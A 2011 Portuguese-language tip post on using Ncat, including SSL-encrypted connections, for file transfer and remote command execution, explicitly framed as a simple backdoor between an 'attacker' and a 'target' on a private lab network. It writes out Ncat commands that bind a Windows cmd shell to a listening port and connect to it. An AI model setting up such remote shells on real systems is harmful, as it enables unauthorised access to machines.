Ncat com SSL

Publicado por Roberto Soares (3spreto) em 07/11/2011

[ Hits: 6.887 ]

Blog: http://codesec.blogspot.com

 


Ncat com SSL



Acredito que a grande maioria conhece o Netcat, não? Pois bem, em uma espécie de variação, surge o Ncat. Sim, são diferentes antes que perguntem. Porém a grande maioria de suas funcionalidades se assemelham comparando-as entre si.

O Ncat utiliza os protocolos TCP e UDP para sua comunicação e também funciona sobre o IPv4 e o IPv6. Uma das características mais simples do Ncat é a transferência de dados entre dois Hosts (Linux <--> Linux, Windows <--> Windows ou Linux <--> Windows) de forma simplificada.

Também nos dá a possibilidade de executar comandos remotamente como se estivéssemos em nossa própria máquina, ainda se não bastasse, conseguimos prover uma "dose" considerável de segurança, utilizando o SSL (Secure Sockets Layer), que é um protocolo criptográfico responsável por prover uma comunicação segura sob a Internet.

Imagine isso para um backdoor simples heim?

Onde:
  • 192.168.0.125 é o IP do atacante. (BackTrack)
  • 192.168.0.147 é o IP do alvo. (XP)

Sem SSL

No alvo digite o comando:

ncat.exe -v -l 1337 -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v 192.168.0.147 1337
Linux: Ncat com SSL

Com SSL

No alvo digite o comando:

ncat.exe -v -l 1337 --ssl -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v --ssl 192.168.0.147 1337
Linux: Ncat com SSL
Agora utilize o wireshark com apenas o filtro "tcp". Em ambas as formas, clique com o botão direito do mouse nas conexões tcp e vá em "Follow Stream" e compare. :D

Ncat Help
Linux: Ncat com SSL

Transferência de arquivos

Ok, ok, antes de perguntarem sobre como efetuar a transferência de um arquivo entre 2 Hosts Linux, aqui vai os comandos.

Máquina que receberá o arquivo.
Linux: Ncat com SSL
Máquina que enviará o arquivo.
Linux: Ncat com SSL
Veja o novo conteúdo do arquivo.
Linux: Ncat com SSL

Links

Previamente publicada em: Até a próxima!
:wq!

Outras dicas deste autor

Redirecionamento de portas com socat

Atualizando o BackTrack 4 com o apt-get e Fast-Track

VirusZoo - Um zoológico diferente

Escutar e gravar rádios online

theHarvester - Vamos colher alguns e-mails?

Leitura recomendada

Darkstat - Um analisador de tráfego de rede

Para quem quer dar o primeiro passo em direção ao mundo Hacking

Protegendo-se contra ping

Desabilitando consulta de versão de servidor Bind

Desativar tty extra no Ubuntu 10.04

  

Comentários

Nenhum comentário foi encontrado.



Contribuir com comentário